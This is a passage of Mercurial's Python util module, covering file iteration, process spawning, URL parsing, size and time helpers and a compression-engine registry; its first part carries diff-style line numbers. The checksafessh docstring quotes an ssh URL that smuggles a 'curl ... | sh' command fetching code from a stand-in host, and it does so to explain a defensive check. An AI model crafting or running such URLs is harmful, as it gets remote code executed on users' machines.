2596 2602 # fp.__iter__ but not other fp.read* methods.
2597 2603 #
2598 2604 # On modern systems like Linux, the "read" syscall cannot be interrupted
2599 2605 # when reading "fast" files like on-disk files. So the EINTR issue only
2600 2606 # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
2601 2607 # files approximately as "fast" files and use the fast (unsafe) code path,
2602 2608 # to minimize the performance impact.
2603 2609 if sys.version_info >= (2, 7, 4):
2604 2610 # fp.readline deals with EINTR correctly, use it as a workaround.
2605 2611 def _safeiterfile(fp):
2606 2612 return iter(fp.readline, '')
2607 2613 else:
2608 2614 # fp.read* are broken too, manually deal with EINTR in a stupid way.
2609 2615 # note: this may block longer than necessary because of bufsize.
2610 2616 def _safeiterfile(fp, bufsize=4096):
2611 2617 fd = fp.fileno()
2612 2618 line = ''
2613 2619 while True:
2614 2620 try:
2615 2621 buf = os.read(fd, bufsize)
2616 2622 except OSError as ex:
2617 2623 # os.read only raises EINTR before any data is read
2618 2624 if ex.errno == errno.EINTR:
2619 2625 continue
2620 2626 else:
2621 2627 raise
2622 2628 line += buf
2623 2629 if '\n' in buf:
2624 2630 splitted = line.splitlines(True)
2625 2631 line = ''
2626 2632 for l in splitted:
2627 2633 if l[-1] == '\n':
2628 2634 yield l
2629 2635 else:
2630 2636 line = l
2631 2637 if not buf:
2632 2638 break
2633 2639 if line:
2634 2640 yield line
2635 2641
2636 2642 def iterfile(fp):
2637 2643 fastpath = True
2638 2644 if type(fp) is file:
2639 2645 fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
2640 2646 if fastpath:
2641 2647 return fp
2642 2648 else:
2643 2649 return _safeiterfile(fp)
2644 2650 else:
2645 2651 # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
2646 2652 def iterfile(fp):
2647 2653 return fp
2648 2654
2649 2655 def iterlines(iterator):
2650 2656 for chunk in iterator:
2651 2657 for line in chunk.splitlines():
2652 2658 yield line
2653 2659
2654 2660 def expandpath(path):
2655 2661 return os.path.expanduser(os.path.expandvars(path))
2656 2662
2657 2663 def hgcmd():
2658 2664 """Return the command used to execute current hg
2659 2665
2660 2666 This is different from hgexecutable() because on Windows we want
2661 2667 to avoid things opening new shell windows like batch files, so we
2662 2668 get either the python call or current executable.
2663 2669 """
2664 2670 if mainfrozen():
2665 2671 if getattr(sys, 'frozen', None) == 'macosx_app':
2666 2672 # Env variable set by py2app
2667 2673 return [encoding.environ['EXECUTABLEPATH']]
2668 2674 else:
2669 2675 return [pycompat.sysexecutable]
2670 2676 return gethgcmd()
2671 2677
2672 2678 def rundetached(args, condfn):
2673 2679 """Execute the argument list in a detached process.
2674 2680
2675 2681 condfn is a callable which is called repeatedly and should return
2676 2682 True once the child process is known to have started successfully.
2677 2683 At this point, the child process PID is returned. If the child
2678 2684 process fails to start or finishes before condfn() evaluates to
2679 2685 True, return -1.
2680 2686 """
2681 2687 # Windows case is easier because the child process is either
2682 2688 # successfully starting and validating the condition or exiting
2683 2689 # on failure. We just poll on its PID. On Unix, if the child
2684 2690 # process fails to start, it will be left in a zombie state until
2685 2691 # the parent waits on it, which we cannot do since we expect a long
2686 2692 # running process on success. Instead we listen for SIGCHLD telling
2687 2693 # us our child process terminated.
2688 2694 terminated = set()
2689 2695 def handler(signum, frame):
2690 2696 terminated.add(os.wait())
2691 2697 prevhandler = None
2692 2698 SIGCHLD = getattr(signal, 'SIGCHLD', None)
2693 2699 if SIGCHLD is not None:
2694 2700 prevhandler = signal.signal(SIGCHLD, handler)
2695 2701 try:
2696 2702 pid = spawndetached(args)
2697 2703 while not condfn():
2698 2704 if ((pid in terminated or not testpid(pid))
2699 2705 and not condfn()):
2700 2706 return -1
2701 2707 time.sleep(0.1)
2702 2708 return pid
2703 2709 finally:
2704 2710 if prevhandler is not None:
2705 2711 signal.signal(signal.SIGCHLD, prevhandler)
2706 2712
2707 2713 def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
2708 2714 """Return the result of interpolating items in the mapping into string s.
2709 2715
2710 2716 prefix is a single character string, or a two character string with
2711 2717 a backslash as the first character if the prefix needs to be escaped in
2712 2718 a regular expression.
2713 2719
2714 2720 fn is an optional function that will be applied to the replacement text
2715 2721 just before replacement.
2716 2722
2717 2723 escape_prefix is an optional flag that allows using doubled prefix for
2718 2724 its escaping.
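
Example (illustrative; the backslash escapes the prefix for the regexp):

>>> interpolate(br'\$', {b'foo': b'bar'}, b'cd $foo ef')
'cd bar ef'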
2719 2725 """
2720 2726 fn = fn or (lambda s: s)
2721 2727 patterns = '|'.join(mapping.keys())
2722 2728 if escape_prefix:
2723 2729 patterns += '|' + prefix
2724 2730 if len(prefix) > 1:
2725 2731 prefix_char = prefix[1:]
2726 2732 else:
2727 2733 prefix_char = prefix
2728 2734 mapping[prefix_char] = prefix_char
2729 2735 r = remod.compile(br'%s(%s)' % (prefix, patterns))
2730 2736 return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
2731 2737
2732 2738 def getport(port):
2733 2739 """Return the port for a given network service.
2734 2740
2735 2741 If port is an integer, it's returned as is. If it's a string, it's
2736 2742 looked up using socket.getservbyname(). If there's no matching
2737 2743 service, error.Abort is raised.
2738 2744 """
2739 2745 try:
2740 2746 return int(port)
2741 2747 except ValueError:
2742 2748 pass
2743 2749
2744 2750 try:
2745 2751 return socket.getservbyname(pycompat.sysstr(port))
2746 2752 except socket.error:
2747 2753 raise Abort(_("no port number associated with service '%s'") % port)
2748 2754
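# Example sketch (illustrative; the service lookup depends on the local
# services database):
#
#   getport(8080)     # -> 8080
#   getport('http')   # -> 80 on most systems, error.Abort otherwise
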
2749 2755 _booleans = {'1': True, 'yes': True, 'true': True, 'on': True, 'always': True,
2750 2756 '0': False, 'no': False, 'false': False, 'off': False,
2751 2757 'never': False}
2752 2758
2753 2759 def parsebool(s):
2754 2760 """Parse s into a boolean.
2755 2761
2756 2762 If s is not a valid boolean, returns None.
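
>>> parsebool(b'on'), parsebool(b'0'), parsebool(b'maybe')
(True, False, None)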
2757 2763 """
2758 2764 return _booleans.get(s.lower(), None)
2759 2765
2760 2766 _hextochr = dict((a + b, chr(int(a + b, 16)))
2761 2767 for a in string.hexdigits for b in string.hexdigits)
2762 2768
2763 2769 class url(object):
2764 2770 r"""Reliable URL parser.
2765 2771
2766 2772 This parses URLs and provides attributes for the following
2767 2773 components:
2768 2774
2769 2775 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2770 2776
2771 2777 Missing components are set to None. The only exception is
2772 2778 fragment, which is set to '' if present but empty.
2773 2779
2774 2780 If parsefragment is False, fragment is included in query. If
2775 2781 parsequery is False, query is included in path. If both are
2776 2782 False, both fragment and query are included in path.
2777 2783
2778 2784 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2779 2785
2780 2786 Note that for backward compatibility reasons, bundle URLs do not
2781 2787 take host names. That means 'bundle://../' has a path of '../'.
2782 2788
2783 2789 Examples:
2784 2790
2785 2791 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
2786 2792 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2787 2793 >>> url(b'ssh://[::1]:2200//home/joe/repo')
2788 2794 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2789 2795 >>> url(b'file:///home/joe/repo')
2790 2796 <url scheme: 'file', path: '/home/joe/repo'>
2791 2797 >>> url(b'file:///c:/temp/foo/')
2792 2798 <url scheme: 'file', path: 'c:/temp/foo/'>
2793 2799 >>> url(b'bundle:foo')
2794 2800 <url scheme: 'bundle', path: 'foo'>
2795 2801 >>> url(b'bundle://../foo')
2796 2802 <url scheme: 'bundle', path: '../foo'>
2797 2803 >>> url(br'c:\foo\bar')
2798 2804 <url path: 'c:\\foo\\bar'>
2799 2805 >>> url(br'\\blah\blah\blah')
2800 2806 <url path: '\\\\blah\\blah\\blah'>
2801 2807 >>> url(br'\\blah\blah\blah#baz')
2802 2808 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
2803 2809 >>> url(br'file:///C:\users\me')
2804 2810 <url scheme: 'file', path: 'C:\\users\\me'>
2805 2811
2806 2812 Authentication credentials:
2807 2813
2808 2814 >>> url(b'ssh://joe:xyz@x/repo')
2809 2815 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
2810 2816 >>> url(b'ssh://joe@x/repo')
2811 2817 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
2812 2818
2813 2819 Query strings and fragments:
2814 2820
2815 2821 >>> url(b'http://host/a?b#c')
2816 2822 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
2817 2823 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
2818 2824 <url scheme: 'http', host: 'host', path: 'a?b#c'>
2819 2825
2820 2826 Empty path:
2821 2827
2822 2828 >>> url(b'')
2823 2829 <url path: ''>
2824 2830 >>> url(b'#a')
2825 2831 <url path: '', fragment: 'a'>
2826 2832 >>> url(b'http://host/')
2827 2833 <url scheme: 'http', host: 'host', path: ''>
2828 2834 >>> url(b'http://host/#a')
2829 2835 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
2830 2836
2831 2837 Only scheme:
2832 2838
2833 2839 >>> url(b'http:')
2834 2840 <url scheme: 'http'>
2835 2841 """
2836 2842
2837 2843 _safechars = "!~*'()+"
2838 2844 _safepchars = "/!~*'()+:\\"
2839 2845 _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match
2840 2846
2841 2847 def __init__(self, path, parsequery=True, parsefragment=True):
2842 2848 # We slowly chomp away at path until we have only the path left
2843 2849 self.scheme = self.user = self.passwd = self.host = None
2844 2850 self.port = self.path = self.query = self.fragment = None
2845 2851 self._localpath = True
2846 2852 self._hostport = ''
2847 2853 self._origpath = path
2848 2854
2849 2855 if parsefragment and '#' in path:
2850 2856 path, self.fragment = path.split('#', 1)
2851 2857
2852 2858 # special case for Windows drive letters and UNC paths
2853 2859 if hasdriveletter(path) or path.startswith('\\\\'):
2854 2860 self.path = path
2855 2861 return
2856 2862
2857 2863 # For compatibility reasons, we can't handle bundle paths as
2858 2864 # normal URLs
2859 2865 if path.startswith('bundle:'):
2860 2866 self.scheme = 'bundle'
2861 2867 path = path[7:]
2862 2868 if path.startswith('//'):
2863 2869 path = path[2:]
2864 2870 self.path = path
2865 2871 return
2866 2872
2867 2873 if self._matchscheme(path):
2868 2874 parts = path.split(':', 1)
2869 2875 if parts[0]:
2870 2876 self.scheme, path = parts
2871 2877 self._localpath = False
2872 2878
2873 2879 if not path:
2874 2880 path = None
2875 2881 if self._localpath:
2876 2882 self.path = ''
2877 2883 return
2878 2884 else:
2879 2885 if self._localpath:
2880 2886 self.path = path
2881 2887 return
2882 2888
2883 2889 if parsequery and '?' in path:
2884 2890 path, self.query = path.split('?', 1)
2885 2891 if not path:
2886 2892 path = None
2887 2893 if not self.query:
2888 2894 self.query = None
2889 2895
2890 2896 # // is required to specify a host/authority
2891 2897 if path and path.startswith('//'):
2892 2898 parts = path[2:].split('/', 1)
2893 2899 if len(parts) > 1:
2894 2900 self.host, path = parts
2895 2901 else:
2896 2902 self.host = parts[0]
2897 2903 path = None
2898 2904 if not self.host:
2899 2905 self.host = None
2900 2906 # path of file:///d is /d
2901 2907 # path of file:///d:/ is d:/, not /d:/
2902 2908 if path and not hasdriveletter(path):
2903 2909 path = '/' + path
2904 2910
2905 2911 if self.host and '@' in self.host:
2906 2912 self.user, self.host = self.host.rsplit('@', 1)
2907 2913 if ':' in self.user:
2908 2914 self.user, self.passwd = self.user.split(':', 1)
2909 2915 if not self.host:
2910 2916 self.host = None
2911 2917
2912 2918 # Don't split on colons in IPv6 addresses without ports
2913 2919 if (self.host and ':' in self.host and
2914 2920 not (self.host.startswith('[') and self.host.endswith(']'))):
2915 2921 self._hostport = self.host
2916 2922 self.host, self.port = self.host.rsplit(':', 1)
2917 2923 if not self.host:
2918 2924 self.host = None
2919 2925
2920 2926 if (self.host and self.scheme == 'file' and
2921 2927 self.host not in ('localhost', '127.0.0.1', '[::1]')):
2922 2928 raise Abort(_('file:// URLs can only refer to localhost'))
2923 2929
2924 2930 self.path = path
2925 2931
2926 2932 # leave the query string escaped
2927 2933 for a in ('user', 'passwd', 'host', 'port',
2928 2934 'path', 'fragment'):
2929 2935 v = getattr(self, a)
2930 2936 if v is not None:
2931 2937 setattr(self, a, urlreq.unquote(v))
2932 2938
2933 2939 @encoding.strmethod
2934 2940 def __repr__(self):
2935 2941 attrs = []
2936 2942 for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
2937 2943 'query', 'fragment'):
2938 2944 v = getattr(self, a)
2939 2945 if v is not None:
2940 2946 attrs.append('%s: %r' % (a, v))
2941 2947 return '<url %s>' % ', '.join(attrs)
2942 2948
2943 2949 def __bytes__(self):
2944 2950 r"""Join the URL's components back into a URL string.
2945 2951
2946 2952 Examples:
2947 2953
2948 2954 >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
2949 2955 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
2950 2956 >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
2951 2957 'http://user:pw@host:80/?foo=bar&baz=42'
2952 2958 >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
2953 2959 'http://user:pw@host:80/?foo=bar%3dbaz'
2954 2960 >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
2955 2961 'ssh://user:pw@[::1]:2200//home/joe#'
2956 2962 >>> bytes(url(b'http://localhost:80//'))
2957 2963 'http://localhost:80//'
2958 2964 >>> bytes(url(b'http://localhost:80/'))
2959 2965 'http://localhost:80/'
2960 2966 >>> bytes(url(b'http://localhost:80'))
2961 2967 'http://localhost:80/'
2962 2968 >>> bytes(url(b'bundle:foo'))
2963 2969 'bundle:foo'
2964 2970 >>> bytes(url(b'bundle://../foo'))
2965 2971 'bundle:../foo'
2966 2972 >>> bytes(url(b'path'))
2967 2973 'path'
2968 2974 >>> bytes(url(b'file:///tmp/foo/bar'))
2969 2975 'file:///tmp/foo/bar'
2970 2976 >>> bytes(url(b'file:///c:/tmp/foo/bar'))
2971 2977 'file:///c:/tmp/foo/bar'
2972 2978 >>> print(url(br'bundle:foo\bar'))
2973 2979 bundle:foo\bar
2974 2980 >>> print(url(br'file:///D:\data\hg'))
2975 2981 file:///D:\data\hg
2976 2982 """
2977 2983 if self._localpath:
2978 2984 s = self.path
2979 2985 if self.scheme == 'bundle':
2980 2986 s = 'bundle:' + s
2981 2987 if self.fragment:
2982 2988 s += '#' + self.fragment
2983 2989 return s
2984 2990
2985 2991 s = self.scheme + ':'
2986 2992 if self.user or self.passwd or self.host:
2987 2993 s += '//'
2988 2994 elif self.scheme and (not self.path or self.path.startswith('/')
2989 2995 or hasdriveletter(self.path)):
2990 2996 s += '//'
2991 2997 if hasdriveletter(self.path):
2992 2998 s += '/'
2993 2999 if self.user:
2994 3000 s += urlreq.quote(self.user, safe=self._safechars)
2995 3001 if self.passwd:
2996 3002 s += ':' + urlreq.quote(self.passwd, safe=self._safechars)
2997 3003 if self.user or self.passwd:
2998 3004 s += '@'
2999 3005 if self.host:
3000 3006 if not (self.host.startswith('[') and self.host.endswith(']')):
3001 3007 s += urlreq.quote(self.host)
3002 3008 else:
3003 3009 s += self.host
3004 3010 if self.port:
3005 3011 s += ':' + urlreq.quote(self.port)
3006 3012 if self.host:
3007 3013 s += '/'
3008 3014 if self.path:
3009 3015 # TODO: similar to the query string, we should not unescape the
3010 3016 # path when we store it, the path might contain '%2f' = '/',
3011 3017 # which we should *not* escape.
3012 3018 s += urlreq.quote(self.path, safe=self._safepchars)
3013 3019 if self.query:
3014 3020 # we store the query in escaped form.
3015 3021 s += '?' + self.query
3016 3022 if self.fragment is not None:
3017 3023 s += '#' + urlreq.quote(self.fragment, safe=self._safepchars)
3018 3024 return s
3019 3025
3020 3026 __str__ = encoding.strmethod(__bytes__)
3021 3027
3022 3028 def authinfo(self):
3023 3029 user, passwd = self.user, self.passwd
3024 3030 try:
3025 3031 self.user, self.passwd = None, None
3026 3032 s = bytes(self)
3027 3033 finally:
3028 3034 self.user, self.passwd = user, passwd
3029 3035 if not self.user:
3030 3036 return (s, None)
3031 3037 # authinfo[1] is passed to urllib2 password manager, and its
3032 3038 # URIs must not contain credentials. The host is passed in the
3033 3039 # URIs list because Python < 2.4.3 uses only that to search for
3034 3040 # a password.
3035 3041 return (s, (None, (s, self.host),
3036 3042 self.user, self.passwd or ''))
3037 3043
3038 3044 def isabs(self):
3039 3045 if self.scheme and self.scheme != 'file':
3040 3046 return True # remote URL
3041 3047 if hasdriveletter(self.path):
3042 3048 return True # absolute for our purposes - can't be joined()
3043 3049 if self.path.startswith(br'\\'):
3044 3050 return True # Windows UNC path
3045 3051 if self.path.startswith('/'):
3046 3052 return True # POSIX-style
3047 3053 return False
3048 3054
3049 3055 def localpath(self):
3050 3056 if self.scheme == 'file' or self.scheme == 'bundle':
3051 3057 path = self.path or '/'
3052 3058 # For Windows, we need to promote hosts containing drive
3053 3059 # letters to paths with drive letters.
3054 3060 if hasdriveletter(self._hostport):
3055 3061 path = self._hostport + '/' + self.path
3056 3062 elif (self.host is not None and self.path
3057 3063 and not hasdriveletter(path)):
3058 3064 path = '/' + path
3059 3065 return path
3060 3066 return self._origpath
3061 3067
3062 3068 def islocal(self):
3063 3069 '''whether localpath will return something that posixfile can open'''
3064 3070 return (not self.scheme or self.scheme == 'file'
3065 3071 or self.scheme == 'bundle')
3066 3072
3067 3073 def hasscheme(path):
3068 3074 return bool(url(path).scheme)
3069 3075
3070 3076 def hasdriveletter(path):
3071 3077 return path and path[1:2] == ':' and path[0:1].isalpha()
3072 3078
3073 3079 def urllocalpath(path):
3074 3080 return url(path, parsequery=False, parsefragment=False).localpath()
3075 3081
3076 3082 def checksafessh(path):
3077 3083 """check if a path / url is a potentially unsafe ssh exploit (SEC)
3078 3084
3079 3085 This is a sanity check for ssh urls. ssh will parse the first item as
3080 3086 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
3081 3087 Let's prevent these potentially exploitable urls entirely and warn the
3082 3088 user.
3083 3089
3084 3090 Raises an error.Abort when the url is unsafe.
3085 3091 """
3086 3092 path = urlreq.unquote(path)
3087 3093 if path.startswith('ssh://-') or path.startswith('svn+ssh://-'):
3088 3094 raise error.Abort(_('potentially unsafe url: %r') %
3089 3095 (pycompat.bytestr(path),))
3090 3096
3091 3097 def hidepassword(u):
3092 3098 '''hide user credential in a url string
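
>>> hidepassword(b'http://user:secret@example.com/repo')
'http://user:***@example.com/repo'
'''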
3093 3099 u = url(u)
3094 3100 if u.passwd:
3095 3101 u.passwd = '***'
3096 3102 return bytes(u)
3097 3103
3098 3104 def removeauth(u):
3099 3105 '''remove all authentication information from a url string
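
>>> removeauth(b'http://user:secret@example.com/repo')
'http://example.com/repo'
'''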
3100 3106 u = url(u)
3101 3107 u.user = u.passwd = None
3102 3108 return bytes(u)
3103 3109
3104 3110 timecount = unitcountfn(
3105 3111 (1, 1e3, _('%.0f s')),
3106 3112 (100, 1, _('%.1f s')),
3107 3113 (10, 1, _('%.2f s')),
3108 3114 (1, 1, _('%.3f s')),
3109 3115 (100, 0.001, _('%.1f ms')),
3110 3116 (10, 0.001, _('%.2f ms')),
3111 3117 (1, 0.001, _('%.3f ms')),
3112 3118 (100, 0.000001, _('%.1f us')),
3113 3119 (10, 0.000001, _('%.2f us')),
3114 3120 (1, 0.000001, _('%.3f us')),
3115 3121 (100, 0.000000001, _('%.1f ns')),
3116 3122 (10, 0.000000001, _('%.2f ns')),
3117 3123 (1, 0.000000001, _('%.3f ns')),
3118 3124 )
3119 3125
3120 3126 _timenesting = [0]
3121 3127
3122 3128 def timed(func):
3123 3129 '''Report the execution time of a function call to stderr.
3124 3130
3125 3131 During development, use as a decorator when you need to measure
3126 3132 the cost of a function, e.g. as follows:
3127 3133
3128 3134 @util.timed
3129 3135 def foo(a, b, c):
3130 3136 pass
3131 3137 '''
3132 3138
3133 3139 def wrapper(*args, **kwargs):
3134 3140 start = timer()
3135 3141 indent = 2
3136 3142 _timenesting[0] += indent
3137 3143 try:
3138 3144 return func(*args, **kwargs)
3139 3145 finally:
3140 3146 elapsed = timer() - start
3141 3147 _timenesting[0] -= indent
3142 3148 stderr.write('%s%s: %s\n' %
3143 3149 (' ' * _timenesting[0], func.__name__,
3144 3150 timecount(elapsed)))
3145 3151 return wrapper
3146 3152
3147 3153 _sizeunits = (('m', 2**20), ('k', 2**10), ('g', 2**30),
3148 3154 ('kb', 2**10), ('mb', 2**20), ('gb', 2**30), ('b', 1))
3149 3155
3150 3156 def sizetoint(s):
3151 3157 '''Convert a space specifier to a byte count.
3152 3158
3153 3159 >>> sizetoint(b'30')
3154 3160 30
3155 3161 >>> sizetoint(b'2.2kb')
3156 3162 2252
3157 3163 >>> sizetoint(b'6M')
3158 3164 6291456
3159 3165 '''
3160 3166 t = s.strip().lower()
3161 3167 try:
3162 3168 for k, u in _sizeunits:
3163 3169 if t.endswith(k):
3164 3170 return int(float(t[:-len(k)]) * u)
3165 3171 return int(t)
3166 3172 except ValueError:
3167 3173 raise error.ParseError(_("couldn't parse size: %s") % s)
3168 3174
3169 3175 class hooks(object):
3170 3176 '''A collection of hook functions that can be used to extend a
3171 3177 function's behavior. Hooks are called in lexicographic order,
3172 3178 based on the names of their sources.'''
3173 3179
3174 3180 def __init__(self):
3175 3181 self._hooks = []
3176 3182
3177 3183 def add(self, source, hook):
3178 3184 self._hooks.append((source, hook))
3179 3185
3180 3186 def __call__(self, *args):
3181 3187 self._hooks.sort(key=lambda x: x[0])
3182 3188 results = []
3183 3189 for source, hook in self._hooks:
3184 3190 results.append(hook(*args))
3185 3191 return results
3186 3192
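# Example (illustrative): hooks run sorted by source name, and the call
# collects each hook's result:
#
#   h = hooks()
#   h.add('b-src', lambda x: x + 1)
#   h.add('a-src', lambda x: x * 2)
#   h(3)   # -> [6, 4], since 'a-src' sorts before 'b-src'
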
3187 3193 def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%d', depth=0):
3188 3194 '''Yields lines for a nicely formatted stacktrace.
3189 3195 Skips the last 'skip' entries, then returns the last 'depth' entries.
3190 3196 Each file+linenumber is formatted according to fileline.
3191 3197 Each line is formatted according to line.
3192 3198 If line is None, it yields:
3193 3199 length of longest filepath+line number,
3194 3200 filepath+linenumber,
3195 3201 function
3196 3202
3197 3203 Not to be used in production code, but very convenient while developing.
3198 3204 '''
3199 3205 entries = [(fileline % (pycompat.sysbytes(fn), ln), pycompat.sysbytes(func))
3200 3206 for fn, ln, func, _text in traceback.extract_stack()[:-skip - 1]
3201 3207 ][-depth:]
3202 3208 if entries:
3203 3209 fnmax = max(len(entry[0]) for entry in entries)
3204 3210 for fnln, func in entries:
3205 3211 if line is None:
3206 3212 yield (fnmax, fnln, func)
3207 3213 else:
3208 3214 yield line % (fnmax, fnln, func)
3209 3215
3210 3216 def debugstacktrace(msg='stacktrace', skip=0,
3211 3217 f=stderr, otherf=stdout, depth=0):
3212 3218 '''Writes a message to f (stderr) with a nicely formatted stacktrace.
3213 3219 Skips the 'skip' entries closest to the call, then shows 'depth' entries.
3214 3220 By default it will flush stdout first.
3215 3221 It can be used everywhere and intentionally does not require an ui object.
3216 3222 Not be used in production code but very convenient while developing.
3217 3223 '''
3218 3224 if otherf:
3219 3225 otherf.flush()
3220 3226 f.write('%s at:\n' % msg.rstrip())
3221 3227 for line in getstackframes(skip + 1, depth=depth):
3222 3228 f.write(line)
3223 3229 f.flush()
3224 3230
class dirs(object):
    '''a multiset of directory names from a dirstate or manifest'''

    def __init__(self, map, skip=None):
        self._dirs = {}
        addpath = self.addpath
        if safehasattr(map, 'iteritems') and skip is not None:
            for f, s in map.iteritems():
                if s[0] != skip:
                    addpath(f)
        else:
            for f in map:
                addpath(f)

    def addpath(self, path):
        dirs = self._dirs
        for base in finddirs(path):
            if base in dirs:
                dirs[base] += 1
                return
            dirs[base] = 1

    def delpath(self, path):
        dirs = self._dirs
        for base in finddirs(path):
            if dirs[base] > 1:
                dirs[base] -= 1
                return
            del dirs[base]

    def __iter__(self):
        return iter(self._dirs)

    def __contains__(self, d):
        return d in self._dirs

if safehasattr(parsers, 'dirs'):
    dirs = parsers.dirs

def finddirs(path):
    pos = path.rfind('/')
    while pos != -1:
        yield path[:pos]
        pos = path.rfind('/', 0, pos)

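# Illustrative sketch (not part of upstream util.py): finddirs() yields every
# ancestor directory of a slash-separated path, deepest first, and dirs()
# builds a multiset of those ancestors for a whole file list.
def _demodirs():
    assert list(finddirs('a/b/c')) == ['a/b', 'a']
    d = dirs(['a/b/f1', 'a/b/f2', 'a/c/f3'])
    # 'a' is an ancestor of all three files, 'a/b' of the first two.
    return 'a/b' in d and 'a/c' in d and 'a' in d
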
# compression code

SERVERROLE = 'server'
CLIENTROLE = 'client'

compewireprotosupport = collections.namedtuple(u'compenginewireprotosupport',
                                               (u'name', u'serverpriority',
                                                u'clientpriority'))

class compressormanager(object):
    """Holds registrations of various compression engines.

    This class essentially abstracts the differences between compression
    engines to allow new compression formats to be added easily, possibly from
    extensions.

    Compressors are registered against the global instance by calling its
    ``register()`` method.
    """
    def __init__(self):
        self._engines = {}
        # Bundle spec human name to engine name.
        self._bundlenames = {}
        # Internal bundle identifier to engine name.
        self._bundletypes = {}
        # Revlog header to engine name.
        self._revlogheaders = {}
        # Wire proto identifier to engine name.
        self._wiretypes = {}

    def __getitem__(self, key):
        return self._engines[key]

    def __contains__(self, key):
        return key in self._engines

    def __iter__(self):
        return iter(self._engines.keys())

    def register(self, engine):
        """Register a compression engine with the manager.

        The argument must be a ``compressionengine`` instance.
        """
        if not isinstance(engine, compressionengine):
            raise ValueError(_('argument must be a compressionengine'))

        name = engine.name()

        if name in self._engines:
            raise error.Abort(_('compression engine %s already registered') %
                              name)

        bundleinfo = engine.bundletype()
        if bundleinfo:
            bundlename, bundletype = bundleinfo

            if bundlename in self._bundlenames:
                raise error.Abort(_('bundle name %s already registered') %
                                  bundlename)
            if bundletype in self._bundletypes:
                raise error.Abort(_('bundle type %s already registered by %s') %
                                  (bundletype, self._bundletypes[bundletype]))

            # No external facing name declared.
            if bundlename:
                self._bundlenames[bundlename] = name

            self._bundletypes[bundletype] = name

        wiresupport = engine.wireprotosupport()
        if wiresupport:
            wiretype = wiresupport.name
            if wiretype in self._wiretypes:
                raise error.Abort(_('wire protocol compression %s already '
                                    'registered by %s') %
                                  (wiretype, self._wiretypes[wiretype]))

            self._wiretypes[wiretype] = name

        revlogheader = engine.revlogheader()
        if revlogheader and revlogheader in self._revlogheaders:
            raise error.Abort(_('revlog header %s already registered by %s') %
                              (revlogheader, self._revlogheaders[revlogheader]))

        if revlogheader:
            self._revlogheaders[revlogheader] = name

        self._engines[name] = engine

    @property
    def supportedbundlenames(self):
        return set(self._bundlenames.keys())

    @property
    def supportedbundletypes(self):
        return set(self._bundletypes.keys())

    def forbundlename(self, bundlename):
        """Obtain a compression engine registered to a bundle name.

        Will raise KeyError if the bundle type isn't registered.

        Will abort if the engine is known but not available.
        """
        engine = self._engines[self._bundlenames[bundlename]]
        if not engine.available():
            raise error.Abort(_('compression engine %s could not be loaded') %
                              engine.name())
        return engine

    def forbundletype(self, bundletype):
        """Obtain a compression engine registered to a bundle type.

        Will raise KeyError if the bundle type isn't registered.

        Will abort if the engine is known but not available.
        """
        engine = self._engines[self._bundletypes[bundletype]]
        if not engine.available():
            raise error.Abort(_('compression engine %s could not be loaded') %
                              engine.name())
        return engine

    def supportedwireengines(self, role, onlyavailable=True):
        """Obtain compression engines that support the wire protocol.

        Returns a list of engines in prioritized order, most desired first.

        If ``onlyavailable`` is set, filter out engines that can't be
        loaded.
        """
        assert role in (SERVERROLE, CLIENTROLE)

        attr = 'serverpriority' if role == SERVERROLE else 'clientpriority'

        engines = [self._engines[e] for e in self._wiretypes.values()]
        if onlyavailable:
            engines = [e for e in engines if e.available()]

        def getkey(e):
            # Sort first by priority, highest first. In case of tie, sort
            # alphabetically. This is arbitrary, but ensures output is
            # stable.
            w = e.wireprotosupport()
            return -1 * getattr(w, attr), w.name

        return list(sorted(engines, key=getkey))

    def forwiretype(self, wiretype):
        engine = self._engines[self._wiretypes[wiretype]]
        if not engine.available():
            raise error.Abort(_('compression engine %s could not be loaded') %
                              engine.name())
        return engine

    def forrevlogheader(self, header):
        """Obtain a compression engine registered to a revlog header.

        Will raise KeyError if the revlog header value isn't registered.
        """
        return self._engines[self._revlogheaders[header]]

compengines = compressormanager()

class compressionengine(object):
    """Base class for compression engines.

    Compression engines must implement the interface defined by this class.
    """
    def name(self):
        """Returns the name of the compression engine.

        This is the key the engine is registered under.

        This method must be implemented.
        """
        raise NotImplementedError()

    def available(self):
        """Whether the compression engine is available.

        The intent of this method is to allow optional compression engines
        that may not be available in all installations (such as engines relying
        on C extensions that may not be present).
        """
        return True

    def bundletype(self):
        """Describes bundle identifiers for this engine.

        If this compression engine isn't supported for bundles, returns None.

        If this engine can be used for bundles, returns a 2-tuple of strings of
        the user-facing "bundle spec" compression name and an internal
        identifier used to denote the compression format within bundles. To
        exclude the name from external usage, set the first element to ``None``.

        If bundle compression is supported, the class must also implement
        ``compressstream`` and ``decompressorreader``.

        The docstring of this method is used in the help system to tell users
        about this engine.
        """
        return None

    def wireprotosupport(self):
        """Declare support for this compression format on the wire protocol.

        If this compression engine isn't supported for compressing wire
        protocol payloads, returns None.

        Otherwise, returns ``compenginewireprotosupport`` with the following
        fields:

        * String format identifier
        * Integer priority for the server
        * Integer priority for the client

        The integer priorities are used to order the advertisement of format
        support by server and client. The highest integer is advertised
